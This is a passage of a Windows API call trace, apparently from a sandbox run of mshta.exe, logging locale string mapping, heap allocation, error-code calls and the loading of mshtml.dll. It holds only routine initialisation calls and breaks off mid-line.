    \r\n ?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0222.342] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x1ef3d4 | out: lpCharType=0x1ef3d4) returned 1 [0222.342] GetLastError () returned 0x0 [0222.342] SetLastError (dwErrCode=0x0) [0222.342] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0222.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0222.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7d4, cbMultiByte=256, lpWideCharStr=0x1ef0d8, cchWideChar=256 | out: lpWideCharStr) returned 256 [0222.344] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0222.344] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr, cchSrc=256, lpDestStr=0x1eeec8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0222.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x1ef6d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb2\x9f\x7d\xdc\x0c\xf9\x1e", lpUsedDefaultChar=0x0) returned 256 [0222.345] GetLastError () returned 0x0 [0222.345] SetLastError (dwErrCode=0x0) [0222.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0222.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7d4, cbMultiByte=256, lpWideCharStr=0x1ef0f8, cchWideChar=256 | out: lpWideCharStr) returned 256 [0222.345] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0222.345] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr, cchSrc=256, lpDestStr=0x1eeee8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0222.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x1ef5d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb2\x9f\x7d\xdc\x0c\xf9\x1e", lpUsedDefaultChar=0x0) returned 256 [0222.345] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xb4b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0222.345] GetLastError () returned 0x0 [0222.345] SetLastError (dwErrCode=0x0) [0222.345] GetLastError () returned 0x0 [0222.345] SetLastError (dwErrCode=0x0) [0222.345] GetLastError () returned 0x0 [0222.345] SetLastError (dwErrCode=0x0) [0222.345] GetLastError () returned 0x0 [0222.345] SetLastError (dwErrCode=0x0) [0222.345] GetLastError () returned 0x0 [0222.345] SetLastError (dwErrCode=0x0) [0222.345] GetLastError () returned 0x0 [0222.345] SetLastError (dwErrCode=0x0) [0222.345] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.346] SetLastError (dwErrCode=0x0) [0222.346] GetLastError () returned 0x0 [0222.349] SetLastError (dwErrCode=0x0) [0222.349] GetLastError () returned 0x0 [0222.349] SetLastError (dwErrCode=0x0) [0222.349] GetLastError () returned 0x0 [0222.349] SetLastError (dwErrCode=0x0) [0222.349] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.350] SetLastError (dwErrCode=0x0) [0222.350] GetLastError () returned 0x0 [0222.351] SetLastError (dwErrCode=0x0) [0222.351] GetLastError () returned 0x0 [0222.351] SetLastError (dwErrCode=0x0) [0222.351] GetLastError () returned 0x0 [0222.351] SetLastError (dwErrCode=0x0) [0222.351] GetLastError () returned 0x0 [0222.351] SetLastError (dwErrCode=0x0) [0222.351] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xb4) returned 0x521610 [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.353] GetLastError () returned 0x0 [0222.353] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.354] SetLastError (dwErrCode=0x0) [0222.354] GetLastError () returned 0x0 [0222.357] SetLastError (dwErrCode=0x0) [0222.357] GetLastError () returned 0x0 [0222.357] SetLastError (dwErrCode=0x0) [0222.357] GetLastError () returned 0x0 [0222.357] SetLastError (dwErrCode=0x0) [0222.357] GetLastError () returned 0x0 [0222.358] SetLastError (dwErrCode=0x0) [0222.358] GetLastError () returned 0x0 [0222.358] SetLastError (dwErrCode=0x0) [0222.358] GetLastError () returned 0x0 [0222.358] SetLastError (dwErrCode=0x0) [0222.358] GetLastError () returned 0x0 [0222.358] SetLastError (dwErrCode=0x0) [0222.358] GetLastError () returned 0x0 [0222.358] SetLastError (dwErrCode=0x0) [0222.358] GetLastError () returned 0x0 [0222.358] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.361] SetLastError (dwErrCode=0x0) [0222.361] GetLastError () returned 0x0 [0222.362] SetLastError (dwErrCode=0x0) [0222.362] GetLastError () returned 0x0 [0222.362] SetLastError (dwErrCode=0x0) [0222.362] GetLastError () returned 0x0 [0222.362] SetLastError (dwErrCode=0x0) [0222.362] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x5fc) returned 0x5216d0 [0222.362] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x520e78 | out: hHeap=0x520000) returned 1 [0222.363] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb42aef) returned 0x0 [0222.363] GetLastError () returned 0x0 [0222.363] SetLastError (dwErrCode=0x0) [0222.363] GetLastError () returned 0x0 [0222.363] SetLastError (dwErrCode=0x0) [0222.363] GetLastError () returned 0x0 [0222.363] SetLastError (dwErrCode=0x0) [0222.363] GetLastError () returned 0x0 [0222.363] SetLastError (dwErrCode=0x0) [0222.363] GetLastError () returned 0x0 [0222.363] SetLastError (dwErrCode=0x0) [0222.363] GetLastError () returned 0x0 [0222.363] SetLastError (dwErrCode=0x0) [0222.363] GetLastError () returned 0x0 [0222.363] SetLastError (dwErrCode=0x0) [0222.363] GetLastError () returned 0x0 [0222.363] SetLastError (dwErrCode=0x0) [0222.363] GetLastError () returned 0x0 [0222.364] SetLastError (dwErrCode=0x0) [0222.364] GetLastError () returned 0x0 [0222.364] SetLastError (dwErrCode=0x0) [0222.364] GetLastError () returned 0x0 [0222.364] SetLastError (dwErrCode=0x0) [0222.364] GetLastError () returned 0x0 [0222.364] SetLastError (dwErrCode=0x0) [0222.364] GetLastError () returned 0x0 [0222.364] SetLastError (dwErrCode=0x0) [0222.364] GetLastError () returned 0x0 [0222.364] SetLastError (dwErrCode=0x0) [0222.364] GetLastError () returned 0x0 [0222.364] GetVersion () returned 0x1db10106 [0222.364] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76180000 [0222.364] GetProcAddress (hModule=0x76180000, lpProcName="HeapSetInformation") returned 0x76195651 [0222.364] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0222.364] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x105) returned 0x521cd8 [0222.364] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x105) returned 0x521de8 [0222.364] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef96c | out: phkResult=0x1ef96c*=0x42) returned 0x0 [0222.365] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x1ef964, lpData=0x521cd8, lpcbData=0x1ef960*=0x105 | out: lpType=0x1ef964*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x1ef960*=0x1f) returned 0x0 [0222.365] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x73f40000 [0222.537] GetProcessHeap () returned 0x590000 [0222.537] GetVersion () returned 0x1db10106 [0222.537] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76180000 [0222.537] GetProcAddress (hModule=0x76180000, lpProcName="HeapSetInformation") returned 0x76195651 [0222.537] HeapSetInformation (HeapHandle=0x590000, HeapInformationClass=0x0, HeapInformation=0x1ef5f8, HeapInformationLength=0x4) returned 1 [0222.537] malloc (_Size=0x80) returned 0x872640 [0222.537] GetVersion () returned 0x1db10106 [0222.538] GetVersionExA (in: lpVersionInformation=0x1ef4d0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ef4d0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.538] __dllonexit () returned 0x7416717c [0222.538] __dllonexit () returned 0x741673bd [0222.538] GetProcessHeap () returned 0x590000 [0222.538] __dllonexit () returned 0x74167435 [0222.538] __dllonexit () returned 0x74166e75 [0222.538] __dllonexit () returned 0x74166ff5 [0222.538] __dllonexit () returned 0x741671be [0222.538] __dllonexit () returned 0x741672e2 [0222.538] __dllonexit () returned 0x74167320 [0222.538] __dllonexit () returned 0x74167370 [0222.538] __dllonexit () returned 0x74166e53 [0222.538] __dllonexit () returned 0x74166e66 [0222.539] __dllonexit () returned 0x74166a3e [0222.539] __dllonexit () returned 0x74166a46 [0222.539] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc14a [0222.539] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc14a [0222.539] __dllonexit () returned 0x74166a60 [0222.539] __dllonexit () returned 0x74166a7a [0222.539] __dllonexit () returned 0x74166a93 [0222.539] __dllonexit () returned 0x74166aa7 [0222.539] __dllonexit () returned 0x74166ac1 [0222.539] __dllonexit () returned 0x741671f1 [0222.539] __dllonexit () returned 0x74166ad0 [0222.539] __dllonexit () returned 0x74166adf [0222.539] __dllonexit () returned 0x74166aee [0222.539] __dllonexit () returned 0x74166afd [0222.539] __dllonexit () returned 0x74166b0d [0222.539] __dllonexit () returned 0x7416720c [0222.540] __dllonexit () returned 0x74166b1c [0222.540] __dllonexit () returned 0x74166b2f [0222.540] __dllonexit () returned 0x74166b49 [0222.540] __dllonexit () returned 0x74166b58 [0222.540] __dllonexit () returned 0x74166b67 [0222.540] __dllonexit () returned 0x74166b76 [0222.540] __dllonexit () returned 0x74166b85 [0222.540] __dllonexit () returned 0x74166b94 [0222.540] __dllonexit () returned 0x74166ba3 [0222.540] __dllonexit () returned 0x74166bb2 [0222.540] __dllonexit () returned 0x74166bc1 [0222.540] __dllonexit () returned 0x74166bd0 [0222.540] __dllonexit () returned 0x74166bdf [0222.540] __dllonexit () returned 0x74166bee [0222.540] __dllonexit () returned 0x74166bfd [0222.541] __dllonexit () returned 0x74166c0c [0222.541] __dllonexit () returned 0x74166c1b [0222.541] __dllonexit () returned 0x74166c2a [0222.541] __dllonexit () returned 0x74166c3d [0222.541] __dllonexit () returned 0x74166c4c [0222.541] __dllonexit () returned 0x74166c5b [0222.541] __dllonexit () returned 0x74166c75 [0222.541] __dllonexit () returned 0x74166c8f [0222.541] __dllonexit () returned 0x74166ca9 [0222.541] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0222.541] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 